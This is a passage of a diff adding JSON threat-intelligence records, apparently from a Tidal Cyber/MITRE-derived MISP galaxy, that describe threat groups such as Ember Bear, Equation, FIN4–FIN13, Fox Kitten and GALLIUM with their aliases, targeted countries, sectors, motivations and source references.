"similar" + } + ], + "uuid": "458c2ae1-5ddf-40d6-9f57-e38ce07f7af0", + "value": "Lorec53" + }, + { + "description": "[[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)]", + "meta": { + "id": "9fba3deb-1539-42b6-b10a-b12309cf0726" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "similar" + } + ], + "uuid": "d3f83fae-e133-4e00-a53b-f881f0a1f6e0", + "value": "UNC2589" + }, + { + "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", + "meta": { + "id": "4f5d4021-268c-4677-9063-0a06648c3851" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "similar" + } + ], + "uuid": "00c980c7-47ad-409d-bb62-374e5a078de8", + "value": "UAC-0056" + }, + { + "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", + "meta": { + "id": "2968e855-2fc6-4dd3-bf3b-244016608413" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "similar" + } + ], + "uuid": "8196a760-2ea4-40a0-8229-405f43247543", + "value": "Lorec Bear" + }, + { + "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", + "meta": { + "id": "cef9334a-c8c2-4e6f-9d1f-69885568a767" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "similar" + } + ], + "uuid": "097d6980-041e-42b0-b1b0-219f70381167", + "value": "Bleeding Bear" + }, + { + "description": "[Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) likely conducted the [WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) destructive wiper attacks against Ukraine in early 2022.[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)][[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)][[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)] ", + "meta": { + "group_attack_id": "G1003", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "58a29d72-e635-443b-868d-5970497a02be", + "type": "similar" + }, + { + "dest-uuid": "458c2ae1-5ddf-40d6-9f57-e38ce07f7af0", + "type": "similar" + }, + { + "dest-uuid": "d3f83fae-e133-4e00-a53b-f881f0a1f6e0", + "type": "similar" + }, + { + "dest-uuid": "00c980c7-47ad-409d-bb62-374e5a078de8", + "type": "similar" + }, + { + "dest-uuid": "8196a760-2ea4-40a0-8229-405f43247543", + "type": "similar" + }, + { + "dest-uuid": "097d6980-041e-42b0-b1b0-219f70381167", + "type": "similar" + } + ], + "uuid": "407274be-1820-4a84-939e-629313f4de1d", + "value": "Ember Bear" + }, + { + "description": "[Equation](https://app.tidalcyber.com/groups/a4704485-65b5-49ec-bebe-5cc932362dd2) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. [[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]", + "meta": { + "group_attack_id": "G0020", + "observed_countries": [ + "AF", + "BD", + "BE", + "BR", + "EC", + "FR", + "DE", + "HK", + "IN", + "IR", + "IQ", + "KZ", + "LB", + "LY", + "MY", + "ML", + "MX", + "NG", + "PK", + "PS", + "PH", + "QA", + "RU", + "SG", + "SO", + "ZA", + "SD", + "CH", + "SY", + "AE", + "GB", + "US", + "YE" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [ + "a98d7a43-f227-478e-81de-e7299639a355" + ], + "target_categories": [ + "Aerospace", + "Defense", + "Energy", + "Financial Services", + "Government", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "7036fb3d-86b7-4d9c-bc66-1e1ead8b7840", + "type": "similar" + } + ], + "uuid": "a4704485-65b5-49ec-bebe-5cc932362dd2", + "value": "Equation" + }, + { + "description": "[Evilnum](https://app.tidalcyber.com/groups/4bdc62c9-af6a-4377-8431-58a6f39235dd) is a financially motivated threat group that has been active since at least 2018.[[ESET EvilNum July 2020](https://app.tidalcyber.com/references/6851b3f9-0239-40fc-ba44-34a775e9bd4e)]", + "meta": { + "group_attack_id": "G0120", + "observed_countries": [ + "AU", + "CA", + "GB" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services" + ] + }, + "related": [], + "uuid": "4bdc62c9-af6a-4377-8431-58a6f39235dd", + "value": "Evilnum" + }, + { + "description": "[EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) is a financially motivated group that has been closely linked with [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) and the deployment of ransomware including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67). [EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]", + "meta": { + "group_attack_id": "G1011", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [] + }, + "related": [], + "uuid": "396a4361-3e84-47bc-9544-58e287c05799", + "value": "EXOTIC LILY" + }, + { + "description": "[Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]", + "meta": { + "group_attack_id": "G0137", + "observed_countries": [ + "IR" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb", + "value": "Ferocious Kitten" + }, + { + "description": "[FIN10](https://app.tidalcyber.com/groups/345e553a-164d-4c9d-8bf9-19fcf8a51533) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [[FireEye FIN10 June 2017](https://app.tidalcyber.com/references/9d5c3956-7169-48d5-b4d0-f7a56a742adf)]", + "meta": { + "group_attack_id": "G0051", + "observed_countries": [ + "CA", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Casinos Gambling", + "Hospitality Leisure", + "Mining" + ] + }, + "related": [ + { + "dest-uuid": "f2d02410-8c2c-11e9-8df1-a31c1fb33d79", + "type": "similar" + } + ], + "uuid": "345e553a-164d-4c9d-8bf9-19fcf8a51533", + "value": "FIN10" + }, + { + "description": "[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]", + "meta": { + "id": "57ff5c34-56d3-4499-a0ba-05a8bee6e810", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "similar" + } + ], + "uuid": "4a4dfd05-0243-4a4d-a4f5-043a8098034d", + "value": "Pistachio Tempest" + }, + { + "description": "FIN12 is a financially motivated threat actor group believed to be responsible for multiple high-profile ransomware attacks since 2018. The group has attacked victims in various sectors and locations, including multiple attacks on healthcare entities. An October 2021 Mandiant assessment indicated 85% of the group's victims were U.S.-based, and the large majority of them were large enterprises with more than $300 million in annual revenue. The report also assessed that initial access brokers partnering with FIN12 target a wider range of organizations and allow FIN12 actors to select victims for further malicious activity.[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]\n\nFIN12's toolset has reportedly shifted over time. Cobalt Strike has been observed in most intrusions. While TrickBot and Empire were common post-exploitation tools historically, French authorities observed the group using SystemBC alongside Cobalt Strike during a March 2023 hospital center intrusion. Ryuk, and to a lesser degree Conti, were traditionally used ransomware payloads, with the former used in a series of attacks on U.S. healthcare entities in 2020. However, a French CERT assessment published in 2023 linked the group to multiple more recent incidents it investigated and analyzed, which featured deployment of various ransomware families, including Hive, Nokoyawa, Play, Royal, and BlackCat, along with Emotet and BazarLoader malware for initial footholds.[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)][[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]\n\n**Related Vulnerabilities**: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]", + "meta": { + "group_attack_id": "G5008", + "observed_countries": [ + "AU", + "CA", + "CO", + "FR", + "ID", + "KR", + "NZ", + "PG", + "PH", + "ES", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "2743d495-7728-4a75-9e5f-b64854039792", + "ecd84106-2a5b-4d25-854e-b8d1f57f6b75", + "a6ba64e1-4b4a-4bbd-a26d-ce35c22b2530", + "4bc9ab8f-7f57-4b1a-8857-ffaa7e5cc930", + "d385b541-4033-48df-93cd-237ca6e46f36" + ], + "target_categories": [ + "Education", + "Financial Services", + "Government", + "Healthcare", + "Manufacturing", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "4a4dfd05-0243-4a4d-a4f5-043a8098034d", + "type": "similar" + } + ], + "uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "value": "FIN12" + }, + { + "description": "[[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]", + "meta": { + "id": "f6570076-cfe5-5979-8e8a-ff8a17ca18b7" + }, + "related": [ + { + "dest-uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "type": "similar" + } + ], + "uuid": "0bf8168b-e8b6-547b-ba47-a500a4f64a5b", + "value": "Elephant Beetle" + }, + { + "description": "[FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.[[Mandiant FIN13 Aug 2022](https://app.tidalcyber.com/references/ebd9d479-1954-5a4a-b7f0-d5372489733c)][[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]", + "meta": { + "group_attack_id": "G1016", + "observed_countries": [ + "MX" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Commercial", + "Financial Services", + "Hospitality Leisure", + "Retail" + ] + }, + "related": [ + { + "dest-uuid": "0bf8168b-e8b6-547b-ba47-a500a4f64a5b", + "type": "similar" + } + ], + "uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "value": "FIN13" + }, + { + "description": "[FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)][[FireEye FIN4 Stealing Insider NOV 2014](https://app.tidalcyber.com/references/b27f1040-46e5-411a-b238-0b40f6160680)] [FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)][[FireEye Hacking FIN4 Video Dec 2014](https://app.tidalcyber.com/references/6dcfe3fb-c310-49cf-a657-f2cec65c5499)]", + "meta": { + "group_attack_id": "G0085", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services", + "Healthcare", + "Pharmaceuticals" + ] + }, + "related": [ + { + "dest-uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57", + "type": "similar" + } + ], + "uuid": "4b6531dc-5b29-4577-8b54-fa99229ab0ca", + "value": "FIN4" + }, + { + "description": "[FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. [[FireEye Respond Webinar July 2017](https://app.tidalcyber.com/references/e7091d66-7faa-49d6-b16f-be1f79db4471)] [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", + "meta": { + "group_attack_id": "G0053", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Entertainment", + "Hospitality Leisure" + ] + }, + "related": [ + { + "dest-uuid": "44dc2f9c-8c28-11e9-9b9a-7fdced8cbf70", + "type": "similar" + } + ], + "uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "value": "FIN5" + }, + { + "description": "[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]", + "meta": { + "id": "9f03f902-385c-4206-84f9-8b400d46f8c6" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "similar" + } + ], + "uuid": "b7091e08-25be-44de-a445-d81ca9fdc073", + "value": "Skeleton Spider" + }, + { + "description": "[[Security Intelligence ITG08 April 2020](https://app.tidalcyber.com/references/32569f59-14fb-4581-8a42-3bf49fb189e9)]", + "meta": { + "id": "49613f19-cdb5-4063-a2b3-df60c9750723" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "similar" + } + ], + "uuid": "5b35e532-aaed-4e3b-bb9f-452e3c7fa8bb", + "value": "Magecart Group 6" + }, + { + "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", + "meta": { + "id": "81937cf7-c508-4b03-a184-2ed3bf2b153d" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "similar" + } + ], + "uuid": "6e65d12f-a1d8-4f49-9e47-c6a58f950e7f", + "value": "ITG08" + }, + { + "description": "[FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.[[FireEye FIN6 April 2016](https://app.tidalcyber.com/references/8c0997e1-b285-42dd-9492-75065eac8f8b)][[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]", + "meta": { + "group_attack_id": "G0037", + "observed_countries": [ + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services", + "Hospitality Leisure", + "Retail" + ] + }, + "related": [ + { + "dest-uuid": "647894f6-1723-4cba-aba4-0ef0966d5302", + "type": "similar" + }, + { + "dest-uuid": "b7091e08-25be-44de-a445-d81ca9fdc073", + "type": "similar" + }, + { + "dest-uuid": "5b35e532-aaed-4e3b-bb9f-452e3c7fa8bb", + "type": "similar" + }, + { + "dest-uuid": "6e65d12f-a1d8-4f49-9e47-c6a58f950e7f", + "type": "similar" + } + ], + "uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "value": "FIN6" + }, + { + "description": "[[Secureworks GOLD NIAGARA Threat Profile](https://app.tidalcyber.com/references/b11276cb-f6dd-4e91-90cd-9c287fb3e6b1)]", + "meta": { + "id": "35eb1977-d260-4526-8248-289aa4a8a67a" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "similar" + } + ], + "uuid": "89f19c2d-3449-4c67-9f1b-710217bc2a6f", + "value": "GOLD NIAGARA" + }, + { + "description": "ITG14 shares campaign overlap with [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff).[[IBM Ransomware Trends September 2020](https://app.tidalcyber.com/references/eb767436-4a96-4e28-bd34-944842d7593e)]", + "meta": { + "id": "c91ddd70-0a48-4185-bc9c-bb3ca66bf365" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "similar" + } + ], + "uuid": "f67c4cea-6f4e-43c9-ab46-2075a57c4aaf", + "value": "ITG14" + }, + { + "description": "[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]", + "meta": { + "id": "02638e6a-1ed5-4ada-88f8-fd5cea55c5c1" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "similar" + } + ], + "uuid": "7bdc9be3-109a-42e5-88ff-6260c6407478", + "value": "Carbon Spider" + }, + { + "description": "[FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) is a financially-motivated threat group that has been active since 2013. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) Group, but there appears to be several groups using [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware and are therefore tracked separately.[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)][[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)][[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)][[FireEye FIN7 Aug 2018](https://app.tidalcyber.com/references/54e5f23a-5ca6-4feb-8046-db2fb71b400a)][[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)][[Mandiant FIN7 Apr 2022](https://app.tidalcyber.com/references/be9919c0-ca52-593b-aea0-c5e9a262b570)]", + "meta": { + "group_attack_id": "G0046", + "observed_countries": [ + "BG", + "CZ", + "FR", + "DE", + "IE", + "KW", + "LB", + "NO", + "PL", + "RO", + "RU", + "ES", + "AE", + "GB", + "US", + "YE" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "33d22eff-59a1-47e0-b9eb-615dee314595", + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Agriculture", + "Automotive", + "Education", + "Electronics", + "Financial Services", + "Government", + "Healthcare", + "Hospitality Leisure", + "Legal", + "Manufacturing", + "Media", + "Retail", + "Technology", + "Transportation" + ] + }, + "related": [ + { + "dest-uuid": "00220228-a5a4-4032-a30d-826bb55aa3fb", + "type": "similar" + }, + { + "dest-uuid": "89f19c2d-3449-4c67-9f1b-710217bc2a6f", + "type": "similar" + }, + { + "dest-uuid": "f67c4cea-6f4e-43c9-ab46-2075a57c4aaf", + "type": "similar" + }, + { + "dest-uuid": "7bdc9be3-109a-42e5-88ff-6260c6407478", + "type": "similar" + } + ], + "uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "value": "FIN7" + }, + { + "description": "[[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]", + "meta": { + "id": "8c20b2f1-4787-59dc-9c08-3412f337ea42" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "similar" + } + ], + "uuid": "5cd4a69b-7a62-5091-be06-e73477878441", + "value": "Syssphinx" + }, + { + "description": "[FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)][[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)][[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)][[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]", + "meta": { + "group_attack_id": "G0061", + "observed_countries": [ + "CA", + "IT", + "ZA", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "target_categories": [ + "Chemical", + "Hospitality Leisure", + "Insurance", + "Retail", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "a78ae9fe-71cd-4563-9213-7b6260bd9a73", + "type": "similar" + }, + { + "dest-uuid": "5cd4a69b-7a62-5091-be06-e73477878441", + "type": "similar" + } + ], + "uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "value": "FIN8" + }, + { + "description": "[[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)][[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]", + "meta": { + "id": "0977cc1e-b932-405f-9b3e-5794f433168b" + }, + "related": [ + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "similar" + } + ], + "uuid": "70b3c377-6e46-45d1-bc24-edb920ad535d", + "value": "Pioneer Kitten" + }, + { + "description": "[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]", + "meta": { + "id": "4ffe9f06-3d82-4a4e-98a9-4fc684ece5da" + }, + "related": [ + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "similar" + } + ], + "uuid": "89d106ad-e7dc-4b3c-8bbb-b8acbf45d47e", + "value": "UNC757" + }, + { + "description": "[[Dragos PARISITE ](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)][[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]", + "meta": { + "id": "5bdaf4d6-1877-49a3-b180-f7e7839501ae" + }, + "related": [ + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "similar" + } + ], + "uuid": "580af0b1-0ed3-461e-8144-c95364116faa", + "value": "Parisite" + }, + { + "description": "[Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)][[Dragos PARISITE ](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)][[ClearSky Pay2Kitten December 2020](https://app.tidalcyber.com/references/6e09bc1a-8a5d-4512-9176-40eed91af358)]", + "meta": { + "country": "IR", + "group_attack_id": "G0117", + "observed_countries": [ + "AU", + "AT", + "FI", + "FR", + "DE", + "HU", + "IE", + "IL", + "IT", + "KW", + "LB", + "MY", + "PL", + "SA", + "TR", + "AE", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "291c006e-f77a-4c9c-ae7e-084974c0e1eb" + ], + "target_categories": [ + "Aerospace", + "Chemical", + "Defense", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Insurance", + "Manufacturing", + "Media", + "Retail", + "Technology", + "Telecommunications", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "70b3c377-6e46-45d1-bc24-edb920ad535d", + "type": "similar" + }, + { + "dest-uuid": "89d106ad-e7dc-4b3c-8bbb-b8acbf45d47e", + "type": "similar" + }, + { + "dest-uuid": "580af0b1-0ed3-461e-8144-c95364116faa", + "type": "similar" + } + ], + "uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "value": "Fox Kitten" + }, + { + "description": "[[Cybereason Soft Cell June 2019](https://app.tidalcyber.com/references/620b7353-0e58-4503-b534-9250a8f5ae3c)]", + "meta": { + "id": "f62031bd-1f41-469e-8e5e-eef621fc4eac" + }, + "related": [ + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "similar" + } + ], + "uuid": "90e2eeaa-23b5-4bc5-a277-af26f9ee2326", + "value": "Operation Soft Cell" + }, + { + "description": "[GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.[[Cybereason Soft Cell June 2019](https://app.tidalcyber.com/references/620b7353-0e58-4503-b534-9250a8f5ae3c)][[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)][[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]", + "meta": { + "country": "CN", + "group_attack_id": "G0093", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "90e2eeaa-23b5-4bc5-a277-af26f9ee2326", + "type": "similar" + } + ], + "uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "value": "GALLIUM" + }, + { + "description": "[Gallmaker](https://app.tidalcyber.com/groups/cd483597-4eda-4e16-bb58-353488511410) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.[[Symantec Gallmaker Oct 